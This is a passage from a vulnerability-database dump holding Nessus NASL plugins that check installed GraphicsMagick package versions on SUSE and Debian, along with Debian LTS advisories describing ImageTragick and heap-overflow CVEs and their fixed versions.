reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick3-config-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagickWand-Q16-2-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-GraphicsMagick-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-GraphicsMagick-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-debugsource-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-devel-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick++-Q16-11-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick++-Q16-11-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick++-devel-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick-Q16-3-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick3-config-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagickWand-Q16-2-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-GraphicsMagick-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-GraphicsMagick-debuginfo-1.3.21-5.1\") ) 
flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:45", "description": "Several security vulnerabilities were discovered in graphicsmagick a tool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by vulnerabilities collectively known as ImageTragick, that are the consequence of lack of sanitization of untrusted input. An attacker with control on the image input could, with the privileges of the user running the application, execute code (CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made :\n\n1. Remove automatic detection/execution of MVG based on file header or file extension.\n\n2. Remove the ability to cause an input file to be deleted based on a filename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support, removing manual page support, and by adding -dSAFER to all ghostscript invocations.\n\n4. Sanity check the MVG image primitive filename argument to assure that 'magick:' prefix strings will not be interpreted. Please note that this patch will break intentional uses of magick prefix strings in MVG and so some MVG scripts may fail. 
We will search for a more flexible solution.\n\nIn addition the following issues have been fixed :\n\nCVE-2015-8808 Assure that GIF decoder does not use uninitialized data and cause an out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318 Vulnerabilities that allow to read or write outside memory bounds (heap, stack) as well as some NULL pointer dereferences to cause a denial of service when parsing SVG files.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-24T00:00:00", "type": "nessus", "title": "Debian DLA-484-1 : graphicsmagick security update (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8808", "CVE-2016-2317", "CVE-2016-2318", "CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-484.NASL", "href": "https://www.tenable.com/plugins/nessus/91299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and 
package checks in this plugin were\n# extracted from Debian Security Advisory DLA-484-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91299);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2015-8808\", \"CVE-2016-2317\", \"CVE-2016-2318\", \"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-484-1 : graphicsmagick security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security vulnerabilities were discovered in graphicsmagick a\ntool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, execute code (CVE-2016-3714), make HTTP GET\nor FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made :\n\n1. Remove automatic detection/execution of MVG based on file header or\nfile extension.\n\n2. Remove the ability to cause an input file to be deleted based on a\nfilename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support,\nremoving manual page support, and by adding -dSAFER to all ghostscript\ninvocations.\n\n4. 
Sanity check the MVG image primitive filename argument to assure\nthat 'magick:' prefix strings will not be interpreted. Please note\nthat this patch will break intentional uses of magick prefix strings\nin MVG and so some MVG scripts may fail. We will search for a more\nflexible solution.\n\nIn addition the following issues have been fixed :\n\nCVE-2015-8808 Assure that GIF decoder does not use unitialized data\nand cause an out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318 Vulnerabilities that allow to read or\nwrite outside memory bounds (heap, stack) as well as some NULL pointer\nderreferences to cause a denial of service when parsing SVG files.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/05/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag 
= 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:34:44", "description": "A remote denial of service vulnerability has been discovered in graphicsmagick, a collection of image processing tools and associated libraries.\n\nA specially crafted file can be used to produce a heap-based buffer overflow and application crash by exploiting a defect in the AcquireCacheNexus function in magick/pixel_cache.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u14.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNote: The previous graphicsmagick package inadvertently introduced a dependency on liblcms2-2. This version of the package returns to using liblcms1. 
If your system does not otherwise require liblcms2-2, you may want to consider removing it following the graphicsmagick upgrade.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-13T00:00:00", "type": "nessus", "title": "Debian DLA-1168-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16669"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1168.NASL", "href": "https://www.tenable.com/plugins/nessus/104501", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1168-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104501);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-16669\");\n\n script_name(english:\"Debian DLA-1168-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote denial of service vulnerability has been discovered in\ngraphicsmagick, a collection of image processing tools and associated\nlibraries.\n\nA specially crafted file can be used to produce a heap-based buffer\noverflow and application crash by exploiting a defect in the\nAcquireCacheNexus function in magick/pixel_cache.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u14.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNote: The previous graphicsmagick package inadvertently introduced a\ndependency on liblcms2-2. This version of the package returns to using\nliblcms1. If your system does not otherwise require liblcms2-2, you\nmay want to consider removing it following the graphicsmagick upgrade.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/11/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u14\")) 
flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2022-03-26T20:20:00", "description": "Package : graphicsmagick\nVersion : 1.3.20-3+deb8u3\nCVE ID : CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 CVE-2016-5241\n CVE-2016-7446 CVE-2016-7447 CVE-2016-7448 CVE-2016-7449\n CVE-2017-11636 CVE-2017-11643 CVE-2017-12937\n CVE-2017-13063 CVE-2017-13064 CVE-2017-13065\n CVE-2017-13134 CVE-2017-14314 CVE-2017-14733\n CVE-2017-16353 CVE-2017-16669 CVE-2017-17498\n CVE-2017-17500 CVE-2017-17501 CVE-2017-17502\n CVE-2017-17503 CVE-2017-17782 CVE-2017-17912\n CVE-2017-17915\nDebian Bug : 870149 870157 872574 873130 873129 873119 873099 881524\n 881391 884905\n\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-27T21:28:32", "type": "debian", "title": "[SECURITY] [DLA 
1401-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-06-27T21:28:32", "id": "DEBIAN:DLA-1401-1:A41C0", "href": "https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-22T13:49:08", "description": "Package : graphicsmagick\nVersion : 1.3.20-3+deb8u3\nCVE ID : CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 CVE-2016-5241\n CVE-2016-7446 CVE-2016-7447 CVE-2016-7448 CVE-2016-7449\n CVE-2017-11636 CVE-2017-11643 CVE-2017-12937\n CVE-2017-13063 CVE-2017-13064 CVE-2017-13065\n CVE-2017-13134 CVE-2017-14314 CVE-2017-14733\n CVE-2017-16353 CVE-2017-16669 CVE-2017-17498\n CVE-2017-17500 CVE-2017-17501 CVE-2017-17502\n CVE-2017-17503 CVE-2017-17782 CVE-2017-17912\n CVE-2017-17915\nDebian Bug : 870149 870157 872574 873130 873129 873119 873099 881524\n 881391 884905\n\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. 
Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-27T21:28:32", "type": "debian", "title": "[SECURITY] [DLA 1401-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", 
"CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2018-06-27T21:28:32", "id": "DEBIAN:DLA-1401-1:300F8", "href": "https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-22T13:06:10", "description": "Package : graphicsmagick\nVersion : 1.3.16-1.1+deb7u16\nCVE ID : CVE-2017-17498 CVE-2017-17500 CVE-2017-17501\n CVE-2017-17502 CVE-2017-17503 CVE-2017-17782\n CVE-2017-17912 CVE-2017-17915\nDebian Bug : 884905\n\nThe NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-08T13:31:31", "type": "debian", "title": "[SECURITY] [DLA 1231-1] graphicsmagick security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
